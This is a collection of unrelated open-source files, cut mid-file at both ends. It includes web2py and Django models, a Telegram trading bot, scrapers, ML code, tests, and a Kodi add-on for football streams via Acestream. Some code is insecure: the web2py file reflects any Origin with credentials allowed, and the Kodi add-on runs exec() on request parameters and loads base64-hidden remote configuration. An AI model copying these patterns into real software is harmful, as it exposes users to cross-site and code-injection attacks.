application menu add/remove items as required\n# ----------------------------------------------------------------------------------------------------------------------\n\nresponse.menu = [\n (T('Pages'), False, URL('app', 'pages'), [])\n]\n\n# ----------------------------------------------------------------------------------------------------------------------\n# provide shortcuts for development. 
you can remove everything below in production\n# ----------------------------------------------------------------------------------------------------------------------\n\nif not configuration.get('app.production'):\n _app = request.application\n response.menu += [\n (T('This App'), False, '#', [\n (T('Design'), False, URL('admin', 'default', 'design/%s' % _app)),\n (T('Controller'), False,\n URL(\n 'admin', 'default', 'edit/%s/controllers/%s.py' % (_app, request.controller))),\n (T('View'), False,\n URL(\n 'admin', 'default', 'edit/%s/views/%s' % (_app, response.view))),\n (T('DB Model'), False,\n URL(\n 'admin', 'default', 'edit/%s/models/db.py' % _app)),\n (T('Menu Model'), False,\n URL(\n 'admin', 'default', 'edit/%s/models/menu.py' % _app)),\n (T('Config.ini'), False,\n URL(\n 'admin', 'default', 'edit/%s/private/appconfig.ini' % _app)),\n (T('Layout'), False,\n URL(\n 'admin', 'default', 'edit/%s/views/layout.html' % _app)),\n (T('Stylesheet'), False,\n URL(\n 'admin', 'default', 'edit/%s/static/css/web2py-bootstrap3.css' % _app)),\n (T('Database'), False, URL(_app, 'appadmin', 'index')),\n (T('Errors'), False, URL(\n 'admin', 'default', 'errors/' + _app)),\n (T('About'), False, URL(\n 'admin', 'default', 'about/' + _app)),\n ]),\n ('web2py.com', False, '#', [\n (T('Download'), False,\n 'http://www.web2py.com/examples/default/download'),\n (T('Support'), False,\n 'http://www.web2py.com/examples/default/support'),\n (T('Demo'), False, 'http://web2py.com/demo_admin'),\n (T('Quick Examples'), False,\n 'http://web2py.com/examples/default/examples'),\n (T('FAQ'), False, 'http://web2py.com/AlterEgo'),\n (T('Videos'), False,\n 'http://www.web2py.com/examples/default/videos/'),\n (T('Free Applications'),\n False, 'http://web2py.com/appliances'),\n (T('Plugins'), False, 'http://web2py.com/plugins'),\n (T('Recipes'), False, 'http://web2pyslices.com/'),\n ]),\n (T('Documentation'), False, '#', [\n (T('Online book'), False, 'http://www.web2py.com/book'),\n (T('Preface'), False,\n 'http://www.web2py.com/book/default/chapter/00'),\n (T('Introduction'), False,\n 'http://www.web2py.com/book/default/chapter/01'),\n (T('Python'), False,\n 'http://www.web2py.com/book/default/chapter/02'),\n (T('Overview'), False,\n 'http://www.web2py.com/book/default/chapter/03'),\n (T('The Core'), False,\n 'http://www.web2py.com/book/default/chapter/04'),\n (T('The Views'), False,\n 'http://www.web2py.com/book/default/chapter/05'),\n (T('Database'), False,\n 'http://www.web2py.com/book/default/chapter/06'),\n (T('Forms and Validators'), False,\n 'http://www.web2py.com/book/default/chapter/07'),\n (T('Email and SMS'), False,\n 'http://www.web2py.com/book/default/chapter/08'),\n (T('Access Control'), False,\n 'http://www.web2py.com/book/default/chapter/09'),\n (T('Services'), False,\n 'http://www.web2py.com/book/default/chapter/10'),\n (T('Ajax Recipes'), False,\n 'http://www.web2py.com/book/default/chapter/11'),\n (T('Components and Plugins'), False,\n 'http://www.web2py.com/book/default/chapter/12'),\n (T('Deployment Recipes'), False,\n 'http://www.web2py.com/book/default/chapter/13'),\n (T('Other Recipes'), False,\n 'http://www.web2py.com/book/default/chapter/14'),\n (T('Helping web2py'), False,\n 'http://www.web2py.com/book/default/chapter/15'),\n (T(\"Buy web2py's book\"), False,\n 'http://stores.lulu.com/web2py'),\n ]),\n (T('Community'), False, None, [\n (T('Groups'), False,\n 'http://www.web2py.com/examples/default/usergroups'),\n (T('Twitter'), False, 'http://twitter.com/web2py'),\n (T('Live Chat'), False,\n 
'http://webchat.freenode.net/?channels=web2py'),\n        ]),\n    ]\n\n\nUSER_TOKEN_HEADER_KEY = \"x-gg-userid\"\n\nALLOWED_HEADERS = \"Origin, X-Requested-With, Content-Type, Accept, Key, Accept-Ranges, Range, Authorization, %s\" % USER_TOKEN_HEADER_KEY\nALLOWED_METHODS = \"POST, GET, OPTIONS, PUT, PATCH, DELETE, HEAD\"\nEXPOSED_HEADERS = \"Accept-Ranges, Content-Encoding, Content-Length, Content-Range, %s\" % USER_TOKEN_HEADER_KEY\n\n\nresponse.headers['Access-Control-Allow-Credentials'] = 'true'\nresponse.headers[\"Access-Control-Allow-Headers\"] = ALLOWED_HEADERS\nresponse.headers[\"Access-Control-Allow-Methods\"] = ALLOWED_METHODS\nresponse.headers[\"Access-Control-Allow-Origin\"] = request.env.http_origin\nresponse.headers['Access-Control-Max-Age'] = 86400\nresponse.headers[\"Access-Control-Expose-Headers\"] = EXPOSED_HEADERS\nresponse[\"Access-Control-Allow-Credentials\"] = \"true\"\nresponse[\"Access-Control-Allow-Headers\"] = ALLOWED_HEADERS\nresponse[\"Access-Control-Allow-Methods\"] = ALLOWED_METHODS\nresponse[\"Access-Control-Allow-Origin\"] = request.env.http_origin\nresponse['Access-Control-Max-Age'] = 86400\n\nif request.env.request_method == 'OPTIONS':\n    raise HTTP(200, **response.headers)  # short-circuit CORS preflight requests with the headers set above\n\nset_db_defaults_and_requires(db)","repo_name":"myiremark/web2py-restful-openapi-crossplatform-app","sub_path":"src/server/web2py/applications/api/models/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":6355,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"68"}
+{"seq_id":"1485527434","text":"# -*- coding: utf-8 -*-\n\n# Load the data stored in FICHIER as YAML so it can be processed in Python\n\nimport yaml\n\ndef lecture(fichier):\n    # Load the file and store its contents in a dictionary\n    # (SafeLoader avoids executing arbitrary YAML tags and silences the\n    # yaml.load deprecation warning; the with-block closes the file)\n    with open(fichier, \"r\") as stream:\n        docs = yaml.load(stream, Loader=yaml.SafeLoader)\n\n    # Fill in the dictionary fields that were left empty in the file\n    for key in docs.keys():\n        if 'Contenu' not in docs[key].keys():\n            docs[key]['Contenu'] = ''\n        if 'Sujet' not in docs[key].keys():\n            docs[key]['Sujet'] = ''\n        if 'Parent' not in docs[key].keys():\n            docs[key]['Parent'] = []\n        if 'SousGroupe' not in docs[key].keys():\n            docs[key]['SousGroupe'] = []\n    return docs\n\n# Print the contents of the dictionary\nif __name__ == \"__main__\":\n    docs = lecture(\"Sauvegarde4\")\n    for key in docs.keys():\n        print(key, ' -> ', docs[key])","repo_name":"Bencake/Groupes","sub_path":"lecture.py","file_name":"lecture.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"8501639107","text":"\nimport os\nimport logging\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nfrom metaapi_cloud_sdk import MetaApi\nfrom metaapi_cloud_sdk.clients.meta_api_client import MetaApiClient\nfrom metaapi_cloud_sdk.clients.meta_api_client import MarketTrade\n\n# Set up logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\n# Define the forward function\ndef forward(update, context):\n    # Get the message from the source channel\n    message = update.message\n    # Forward the message to the destination channel using your bot\n    context.bot.forward_message(chat_id='@destination_channel', from_chat_id='@source_channel', message_id=message.message_id)\n    # Place a trade on MetaAPI using the message received from the source channel\n    api_token = os.environ['META_API_TOKEN']\n    
account_id = os.environ['META_API_ACCOUNT_ID']\n symbol = 'EURUSD'\n trade_type = 'MARKET'\n volume = 0.01\n stop_loss = 1.2\n take_profit = 1.4\n client = MetaApiClient(api_token)\n account_information = client.get_account(account_id)\n if account_information.state != 'DEPLOYED':\n raise Exception('The account is not deployed')\n if not account_information.connection_status.connected:\n raise Exception('The account is not connected to broker')\n if not account_information.connection_status.trading_permitted:\n raise Exception('The account is not permitted for trading')\n trade = MarketTrade()\n trade.symbol = symbol\n trade.type = trade_type\n trade.volume = volume\n trade.stop_loss = stop_loss\n trade.take_profit = take_profit\n client.create_trade(account_id, trade)\n\n# Define the main function\ndef main():\n # Create an instance of the Updater class and pass in your bot's API token\n updater = Updater(token=os.environ['TELEGRAM_BOT_TOKEN'], use_context=True)\n\n # Get the dispatcher to register handlers\n dispatcher = updater.dispatcher\n\n # Add a handler for forwarding messages and placing trades on MetaAPI\n dispatcher.add_handler(MessageHandler(Filters.chat('@source_channel'), forward))\n\n # Start the bot\n updater.start_polling()\n\nif __name__ == '__main__':\n main()\n","repo_name":"onyechiforever/Tronice","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2604825619","text":"from urllib import request\nimport re\n\nurl = \"http://tieba.baidu.com/f?kw=%E6%89%8B%E6%9C%BA\"\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0\"\n}\n\nreq = request.Request(url=url, headers=headers)\n\nresponse = request.urlopen(req)\n\nhtml = response.read().decode('utf-8')\n\nimgList = re.findall(r' 3:\n x = torch.reshape(x, (-1, seq_len, self.input_size))\n # type change\n x = x.float()\n\n h_0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(self.device)\n c_0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(self.device)\n\n # Propagate input through LSTM\n _, (h_out, _) = self.lstm(x, (h_0, c_0))\n h_out = h_out.view(-1, self.hidden_size) \n out = self.fc(h_out)\n\n # reshape out and change type to match label\n out = torch.reshape(out, (setsz, seq_n))\n out = out.double()\n\n return out\n\ndef main():\n pass\n\nif __name__ == '__main__':\n main()","repo_name":"YuhaoWong0103/fsl_ts","sub_path":"lstm_learner.py","file_name":"lstm_learner.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"68"} +{"seq_id":"34735778100","text":"import time\nimport sys\n\n# globals\ndefault_use_model = 'https://tfhub.dev/google/universal-sentence-encoder-large/3?tf-hub-format=compressed'\ndefault_csv_file_path = './data/articles_small.csv'\n\ndefault_batch_size = 10\ndefault_stop_words = False\ndefault_vector_size = 512\ndefault_elasticindex_name = 'articles_small'\ndefault_elastic_server = 'http://elastic:Elastic123@localhost:9200/'\ndefault_bootstrap_servers = ['localhost:9092']\n\ng_columns = ['id', 'title', 'publication', 'content']\ng_id_index = 0\ng_content_index = 3\ng_content_key = 'content'\n\ng_mapping = {\n 'mappings': {\n 'properties': {\n 'id': {\n 'type': 'text'\n },\n 'title': {\n 'type': 'text'\n },\n 'publication': {\n 'type': 'text'\n 
},\n 'content': {\n 'type': 'text'\n },\n 'embedding': {\n 'type': 'dense_vector',\n 'dims': default_vector_size\n }\n }\n }\n}\n\ndef print_with_time(msg):\n print('{}: {}'.format(time.ctime(), msg))\n sys.stdout.flush()\n","repo_name":"Efficacy-Consulting/sentence-similarity-with-elasticindexing","sub_path":"app/src/similarity_utils.py","file_name":"similarity_utils.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26689829446","text":"from .models import *\nfrom django.forms.models import inlineformset_factory\nfrom django.forms import ModelForm, Textarea\nfrom django import forms\n\nclass RecipeForm(ModelForm):\n class Meta:\n model = Recipe\n fields = ['title','foodname', 'titleimage', 'servings','cookingtime']\n\nclass RecipeinfoForm(ModelForm):\n class Meta:\n model = Recipeinfo\n fields = ['image', 'description']\n\nRecipeinfoInlineFormSet = inlineformset_factory(Recipe, Recipeinfo,\n fields = ['image','description'],\n extra = 2)\n\nfoodinfoInlineFormSet = inlineformset_factory(Recipe, Foodinfo,\n fields = ['ingredient', 'quantity'],\n extra = 2)\n\n\n\n","repo_name":"kguong123/doremi","sub_path":"recipe/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"37583646185","text":"from utils import load_fasta_file_as_lookup\n\n\ndef build_adjacency_list(record_lookup, k=3):\n\n prefix_lookup = {}\n adjacency_list = {}\n\n # Create a lookup from prefix -> record name\n for prefix_name, dna in record_lookup.items():\n prefix = dna[:k]\n\n if prefix not in prefix_lookup:\n prefix_lookup[prefix] = []\n\n prefix_lookup[prefix].append(prefix_name)\n\n # Match suffixes using the prefix lookup\n for suffix_name, dna in record_lookup.items():\n\n suffix = dna[-k:]\n if suffix in prefix_lookup:\n prefix_names = prefix_lookup[suffix]\n\n for prefix_name in prefix_names:\n\n # Don't match an entry to itself\n if suffix_name != prefix_name:\n if suffix_name not in adjacency_list:\n adjacency_list[suffix_name] = []\n\n adjacency_list[suffix_name].append(prefix_name)\n\n return adjacency_list\n\n\nif __name__ == '__main__':\n\n fasta_record_lookup = load_fasta_file_as_lookup('problem_12_data.txt')\n adjacency_list = build_adjacency_list(fasta_record_lookup)\n\n for key, value_list in adjacency_list.items():\n for value in value_list:\n print(key, value)\n\n","repo_name":"JoshVarty/Rosalind","sub_path":"012_Overlap_Graphs.py","file_name":"012_Overlap_Graphs.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32196329388","text":"import factory\n\n\nCONTEXT_COLUMNS = ['pid', 'visit', 'collect_date']\nDUMMY_VISIT_TYPES = ['wk1', 'wk2', 'wk3', 'wk5']\n\n\nclass AssessmentTypeARecord(factory.Factory):\n pid = factory.Faker('uuid4')\n visit = factory.Faker('random_element', elements=DUMMY_VISIT_TYPES)\n collect_date = factory.Faker('date_time_this_year')\n foo = factory.Faker('word')\n bar = factory.Faker('pyint')\n\n\nclass AssessmentTypeBRecord(factory.Factory):\n pid = factory.Faker('uuid4')\n visit = factory.Faker('random_element', elements=DUMMY_VISIT_TYPES)\n collect_date = factory.Faker('date_time_this_year')\n baz = factory.Faker('word')\n caz = factory.Faker('pyint')\n\n\ndef populate_upload(upload, factory_class):\n \"\"\"\n Generates a single dummy column from 
the upload file\n \"\"\"\n\n import unicodecsv as csv\n import io\n\n with io.BytesIO() as buffer:\n fieldnames = CONTEXT_COLUMNS + upload.schema.attributes.keys()\n writer = csv.DictWriter(buffer, fieldnames=fieldnames)\n writer.writeheader()\n writer.writerow(factory.build(dict, FACTORY_CLASS=factory_class))\n upload.project_file = buffer.getvalue()\n\n\ndef test_dummy(\n db_session,\n schema_factory,\n attribute_factory,\n study_factory,\n upload_factory\n ):\n \"\"\"\n It should be able to join two uploads into a single data frame\n \"\"\"\n\n from occams_imports.importers.utils.pivot import load_project_frame\n\n study = study_factory()\n\n schema_a_upload = upload_factory.create(\n study=study,\n schema__attributes={\n 'foo': attribute_factory.create(name='foo', type='string'),\n 'bar': attribute_factory.create(name='bar', type='number'),\n }\n )\n\n schema_b_upload = upload_factory.create(\n study=study,\n schema__attributes={\n 'baz': attribute_factory.create(name='baz', type='string'),\n 'caz': attribute_factory.create(name='caz', type='number'),\n }\n )\n\n populate_upload(schema_a_upload, AssessmentTypeARecord)\n populate_upload(schema_b_upload, AssessmentTypeBRecord)\n db_session.flush()\n\n frame = load_project_frame(db_session, study.name)\n\n expected_columns = [\n '_'.join([study.name, schema_a_upload.schema.name, a.name])\n for a in schema_a_upload.schema.iterleafs()\n ]\n expected_columns += [\n '_'.join([study.name, schema_b_upload.schema.name, a.name])\n for a in schema_b_upload.schema.iterleafs()\n ]\n assert set(expected_columns) < set(frame.columns)\n\n\ndef test_populate_project(\n db_session,\n study_factory,\n schema_factory,\n patient_factory,\n attribute_factory,\n site_factory):\n\n import pandas as pd\n import numpy as np\n\n from occams_studies import models as studies\n from occams_imports.importers.utils.pivot import populate_project\n\n target_project = study_factory()\n target_site = site_factory(name=target_project.name)\n\n target_schema = schema_factory()\n\n target_schema = schema_factory.create(\n attributes={\n 'gender': attribute_factory.create(name='gender', type='number'),\n 'collect_date': attribute_factory.create(\n name='collect_date', type='date'),\n }\n )\n\n target_project.schemata.add(target_schema)\n\n pid1 = patient_factory(site=target_site)\n pid2 = patient_factory(site=target_site)\n pid3 = patient_factory(site=target_site)\n\n data_dict = {\n 'pid': [\n pid1.pid,\n pid2.pid,\n pid3.pid\n ],\n 'visit': ['week4', 'week5', 'week6']\n }\n\n target_demographics = '{}_{}_gender'.format(\n target_project.name, target_schema.name)\n target_collecy_date = '{}_{}_collect_date'.format(\n target_project.name, target_schema.name)\n\n data_dict[target_demographics] = [0, 1, np.nan]\n data_dict[target_collecy_date] = ['2017-01-01', '2017-01-02', '2017-01-01']\n\n consolidated_frame = pd.DataFrame(data_dict)\n\n populate_project(\n db_session,\n target_project.name,\n consolidated_frame\n )\n\n patient1 = (\n db_session.query(studies.Patient)\n .filter_by(pid=pid1.pid)\n .one()\n )\n\n patient2 = (\n db_session.query(studies.Patient)\n .filter_by(pid=pid2.pid)\n .one()\n )\n\n patient3 = (\n db_session.query(studies.Patient)\n .filter_by(pid=pid3.pid)\n .one()\n )\n\n assert len(patient1.entities) == 1\n for entity in patient1.entities:\n assert entity['gender'] == 0\n assert entity['collect_date'] == '2017-01-01'\n\n assert len(patient2.entities) == 1\n for entity in patient2.entities:\n assert entity['gender'] == 1\n assert entity['collect_date'] 
== '2017-01-02'\n\n assert len(patient3.entities) == 1\n for entity in patient3.entities:\n assert entity['gender'] is None\n assert entity['collect_date'] == '2017-01-01'\n","repo_name":"razorlabs/occams_imports","sub_path":"tests/importers/utils/test_pivot.py","file_name":"test_pivot.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"73760384217","text":"import collections\nfrom cmath import inf\nimport random\n\nclass NetworkGenerator:\n def __init__(self) -> None:\n '''Class containing various functions for generation Network objects for the simulation to run on.\n A Network can also be provided via custom JSON file instead.\n '''\n self.info = \"Please see individual generator functions for more information.\"\n\n\n def output_Network_dictionary(self, node_dict, edge_dict):\n '''Returns dictionary containing all Node and Edge information for the newly generated Network.\n '''\n snapshot = {}\n\n edge_snapshots = []\n for edge_key in edge_dict:\n edge = edge_dict[edge_key]\n edge_raw = edge.__dict__\n edge_snapshots.append(edge_raw)\n snapshot[\"edges\"] = edge_snapshots\n\n node_snapshots = []\n for node_key in node_dict:\n node = node_dict[node_key]\n node_raw = node.__dict__ \n node_snapshots.append(node_raw)\n snapshot[\"nodes\"] = node_snapshots\n\n return snapshot\n\n\n def generate_complete_bidirectional_network_default_values(self, number_nodes):\n '''Generates a complete Network consisting of number_nodes Nodes, each connected to every other Node in both directions.\n This Network uses the following default value:\n node.intersection_time_cost = 0\n Please note that this NetworkGenerator function only generates the barebone structures necessary for a Network. 
\n All additional attributes will be loaded via \"DEFAULT_edge_values_config.json\" during the simulation process.\n '''\n number_nodes = number_nodes\n # create Node objects\n complete_network_node_ID_to_node = collections.defaultdict(lambda: None)\n complete_network_edge_ID_to_edge = collections.defaultdict(lambda: None)\n\n for node_index in range(0,number_nodes):\n node_ID = node_index\n new_node = GeneratorNode(node_ID)\n complete_network_node_ID_to_node[node_ID] = new_node\n \n # create Edge objects -- requires Nodes to exist first\n edge_index_counter = 0\n\n for start_node in range(0,number_nodes):\n for end_node in range(0,number_nodes):\n if start_node == end_node:\n pass # no looping roads allowed\n else:\n # ensure unique Edge IDs\n edge_ID = edge_index_counter\n edge_index_counter += 1\n new_inbound_edge = GeneratorEdge(edge_ID, start_node, end_node)\n complete_network_edge_ID_to_edge[edge_ID] = new_inbound_edge\n \n # return complete_network_node_ID_to_node, complete_network_edge_ID_to_edge\n network_dict = self.output_Network_dictionary(complete_network_node_ID_to_node, complete_network_edge_ID_to_edge)\n return network_dict\n\n\n def create_ER_network_default_values(self, number_nodes, probability_joining = 0.5):\n '''Creates an Erdos Renyi Network based on the given parameters:\n A each pair of nodes has a probability_joining (0 < p < 1) of being connected in an ER Network.\n As this is a directional Network, each pair will be considered separately per direction.\n This Network uses the following default values:\n probability_joining = 0.5 # can be overwriten via user input\n node.intersection_time_cost = 0\n Please note that this NetworkGenerator function only generates the barebone structures necessary for a Network. \n All additional attributes will be loaded via \"DEFAULT_edge_values_config.json\" during the simulation process.\n '''\n number_nodes = number_nodes\n # create Node objects\n complete_network_node_ID_to_node = collections.defaultdict(lambda: None)\n complete_network_edge_ID_to_edge = collections.defaultdict(lambda: None)\n\n for node_index in range(0,number_nodes):\n node_ID = node_index\n new_node = GeneratorNode(node_ID)\n complete_network_node_ID_to_node[node_ID] = new_node\n \n # create Edge objects -- requires Nodes to exist first\n edge_index_counter = 0\n\n for start_node in range(0,number_nodes):\n for end_node in range(0,number_nodes):\n if start_node == end_node:\n pass # no looping roads allowed\n else:\n # generate random number\n random_number = random.uniform(0,1)\n if random_number <= probability_joining:\n edge_ID = edge_index_counter\n edge_index_counter += 1\n new_inbound_edge = GeneratorEdge(edge_ID, start_node, end_node)\n complete_network_edge_ID_to_edge[edge_ID] = new_inbound_edge\n\n\nclass GeneratorNode:\n def __init__(self, id) -> None:\n '''Contains all attributes necessary for creating a network intersection (Node).\n Attributes:\n id: Unique ID associated with this Node object.\n intersection_time_cost: Value representing time in ticks required to cross intersection. 
0 <= value < 1.\n '''\n self.id = id\n self.intersection_time_cost = 0 \n\n\nclass GeneratorEdge:\n def __init__(self, \n id, \n start_node_id, \n end_node_id, \n edge_length = None, \n max_speed = None, \n max_capacity = None \n ) -> None: \n '''Contains all attributes necessary for creating a road segment (Edge).\n Attributes generated in all NetworkGenerator functions:\n id: Unique ID associated with this Edge object.\n start_node_id: Node from which this Edge originates.\n end_node_id: Node from which this Edge terminates.\n Attributes generated only in probabilistic NetworkGenerator functions:\n edge_length: Physical length of the Edge (ex: meter length of a road).\n max_speed: (optional) Unit speed limit of the road. Without obstructions, this is the maximum distance a Car can move on this Edge in one tick.\n max_capacity: (optional) Maximum number of Car objects allowed on the Edge.\n '''\n self.id = id\n self.start_node_id = start_node_id\n self.end_node_id = end_node_id\n\n self.edge_length = edge_length\n self.max_speed = max_speed\n self.max_capacity = max_capacity\n","repo_name":"julialruiter/Traffic_Simulator","sub_path":"configs/UnderlyingNetworkGenerator.py","file_name":"UnderlyingNetworkGenerator.py","file_ext":"py","file_size_in_byte":6611,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"71736380376","text":"import datetime\n\ndef calculate_age(birthday):\n today = datetime.date.today()\n age = today.year - birthday.year\n return age\n\ndef input_entry():\n while True:\n try:\n name, birthday_str = input(\"Input your entry (name, DD/MM/YYYY): \").split(\", \")\n birthday = datetime.datetime.strptime(birthday_str, \"%d/%m/%Y\").date()\n if birthday > datetime.date.today():\n raise ValueError(\"Upcoming birthday\")\n if not name.isalpha():\n raise ValueError(\"Name containing number\")\n age = calculate_age(birthday)\n name = name.capitalize()\n database[name] = {\"birthday\": birthday, \"age\": age}\n print(f\"Successfully entered: {name}, {age} years old\")\n break\n except ValueError as e :\n print(e)\n\ndef read_entries():\n print(\"List of entries:\")\n for name in database:\n entry = database[name]\n print(f\"{name}, {entry['age']} years old\")\n\ndef delete_entry():\n name = input(\"Input the name of the entry you want to delete: \").capitalize()\n if name in database:\n del database[name]\n print(f\"Successfully deleted: {name}\")\n else:\n print(f\"{name} not found in the database\")\n\ndatabase = {}\n\nwhile True:\n action = input(\"What do you want to do (input, read, delete, exit): \")\n if action == \"input\":\n input_entry()\n elif action == \"read\":\n read_entries()\n elif action == \"delete\":\n delete_entry()\n elif action == \"exit\":\n print(\"Goodbye\")\n break\n else:\n print(\"Invalid action\")\n","repo_name":"AmrGamal-58/Ctds","sub_path":"Ctd-4.0.py","file_name":"Ctd-4.0.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"71444590617","text":"# -*- coding: utf-8 -*-\n# License: GPL (http://www.gnu.org/licenses/gpl-3.0.html)\n# Gracias a la librería plugintools de Jesús (www.mimediacenter.info), PlatformCode y Core del Grupo Balandro (https://linktr.ee/balandro)\n\nimport os, sys, urllib, re, shutil, zipfile, base64\n#import xbmc, xbmcgui, xbmcaddon, xbmcplugin, requests\nimport xbmc, xbmcgui, xbmcaddon, xbmcplugin\nimport locale, time, random, plugintools\nimport resolvers\n\nif 
sys.version_info[0] < 3:\n import urllib2\nelse:\n import urllib.error as urllib2\n\nfrom core import httptools\nfrom core.item import Item\nfrom platformcode.config import WebErrorException\n\nusaHorus = True\nsetting = xbmcaddon.Addon().getSetting\nif setting('lanzarCon') == \"0\": ##0 = Solo Acestream 1 = Horus+Acestream\n usaHorus = False\n\n\naddonName = xbmcaddon.Addon().getAddonInfo(\"name\")\naddonVersion = xbmcaddon.Addon().getAddonInfo(\"version\")\naddonId = xbmcaddon.Addon().getAddonInfo(\"id\")\naddonPath = xbmcaddon.Addon().getAddonInfo(\"path\")\n\nversion=\"(v0.1.0)\"\ncomparaVersion = \"0.1.0\"\n\naddonPath = xbmcaddon.Addon().getAddonInfo(\"path\")\nmi_data = xbmc.translatePath(os.path.join('special://home/userdata/addon_data/plugin.video.FutbolTream/'))\nmi_addon = xbmc.translatePath(os.path.join('special://home/addons/plugin.video.FutbolTream'))\n\nfondo = xbmc.translatePath(os.path.join(mi_addon,'fanart.jpg'))\nlogoprin = xbmc.translatePath(os.path.join(mi_addon,'icon.png'))\n\nmislogos = xbmc.translatePath(os.path.join('special://home/addons/plugin.video.FutbolTream/jpg/'))\nlogo_transparente = xbmc.translatePath(os.path.join(mislogos , 'transparente.png'))\n\naudios = xbmc.translatePath(os.path.join('special://home/addons/plugin.video.FutbolTream/audios/'))\nlasliao = xbmc.translatePath(os.path.join(audios, 'error.mp3'))\n\nhorusTorrent = \"eydhY3Rpb24nOiAncGxheScsICdmYW5hcnQnOiAnJywgJ2ljb24nOiAnTUktSUNPTk8nLCAndXJsJzogJ01JLVRPUlJFTlQnLCAnbGFiZWwnOiAnTUktVElUVUxPJ30=\" ## Para Torrents\nhorusAce = \"eydhY3Rpb24nOiAncGxheScsICdmYW5hcnQnOiAnTUktRkFOQVJUJywgJ2ljb24nOiAnTUktSUNPTk8nLCAnaWQnOiAnTUktSUQtQUNFJywgJ2xhYmVsJzogJ01JLVRJVFVMTyd9\" ##Para id-Aces\n\ndatosConf = httptools.downloadpage(base64.b64decode(\"aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzVxV3dTQ3FF\".encode('utf-8')).decode('utf-8')).data\nListaCentralAcotaInicio = plugintools.find_single_match(datosConf,'ListaCentralAcotaInicio>(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?) comparaVersion:\n lin1 = \"[COLOR blue]Estás usando una versión obsoleta de FutbolTream. La versión actualizada es: [COLOR green][B]\"+versionActual+\"[/B][/COLOR]\"\n lin2 = \"\\n\" + \"Instala la nueva versión desde [COLOR yellow][B]Kelebek.[/B][/COLOR]\"\n xbmcgui.Dialog().ok( \"[COLOR lime]Versión NO Actualizada[/COLOR]\" , lin1+lin2 )\n\n\ndataWeb = httptools.downloadpage(web, headers=headers).data + \"\"\n\nguia_eventos = plugintools.find_multiple_matches(dataWeb,'(.*?)')\n\n\nif not os.path.exists(mi_data):\n\tos.makedirs(mi_data) # Si no existe el directorio, lo creo\n\n\ncabecera = \"[COLOR mediumslateblue][B] FutbolTream \"+version+\" [COLOR red] ····[COLOR yellowgreen]by AceTorr[COLOR red]····[/B][/COLOR]\"\n\t\n\n# Punto de Entrada\ndef run():\n\tplugintools.log('[%s %s] Running %s... 
' % (addonName, addonVersion, addonName))\n\n\t# Obteniendo parámetros...\n\tparams = plugintools.get_params()\n \n\t\n\tif params.get(\"action\") is None:\n\t\tmain_list(params)\n\telse:\n\t\taction = params.get(\"action\")\n\t\texec(action+\"(params)\")\n \n\n\tplugintools.close_item_list() \n\n\n\n# Principal\ndef main_list(params):\n \n plugintools.add_item(action=\"\",url=\"\",title=cabecera,thumbnail=logoprin,fanart=fondo,folder=False,isPlayable=False)\n\n #if len(guia_eventos) > 0:\n if len(guia_eventos) > 0 and pongo_Agenda == \"SI\":\n plugintools.add_item(action=\"guiaEventos\",url=web,title='[COLOR lime]>>> Guía de Eventos (entrar) <<<[/COLOR]', thumbnail=logoprin, fanart=fondo, folder=True, isPlayable=False)\n else:\n plugintools.add_item(action=\"\",url=\"\",title=\"[COLOR red]····Guia de Eventos temporalmente Inactiva en la Web····[/COLOR]\",thumbnail=logoprin,fanart=fondo,folder=False,isPlayable=False)\n \n if (\"Canales HD\" in dataWeb) and (\"Lucas_m_\" in dataWeb) and (\"@MANUK0S\" in dataWeb): ##Si están tituladas las 3 Listas del Centro de la página\n plugintools.add_item(action=\"bylucas\",url=web,title='[COLOR white]'+Lista1_Titulo+'[/COLOR]', thumbnail=logoprin, fanart=fondo, folder=True, isPlayable=False)\n plugintools.add_item(action=\"manukos\",url=web,title='[COLOR white]'+Lista2_Titulo+'[/COLOR]', thumbnail=logoprin, fanart=fondo, folder=True, isPlayable=False)\n plugintools.add_item(action=\"canalesHD\",url=web,title='[COLOR white]'+Lista3_Titulo+'[/COLOR]', thumbnail=logoprin, fanart=fondo, folder=True, isPlayable=False)\n else: ##Intentamos coger todos los links en una única lista\n plugintools.add_item(action=\"listaCentral\",url=web,title='[COLOR white]Recopilación Temporal de Listas [COLOR lime]>>entrar<< [COLOR coral](Faltan datos de creadores en la Web)[/COLOR]', thumbnail=logoprin, fanart=fondo, folder=True, isPlayable=False)\n \n if \"Canales 365\" in dataWeb:\n plugintools.add_item(action=\"canales365\",url=\"\",title='[COLOR white]Canales 365[/COLOR]', thumbnail=logoprin, fanart=fondo, 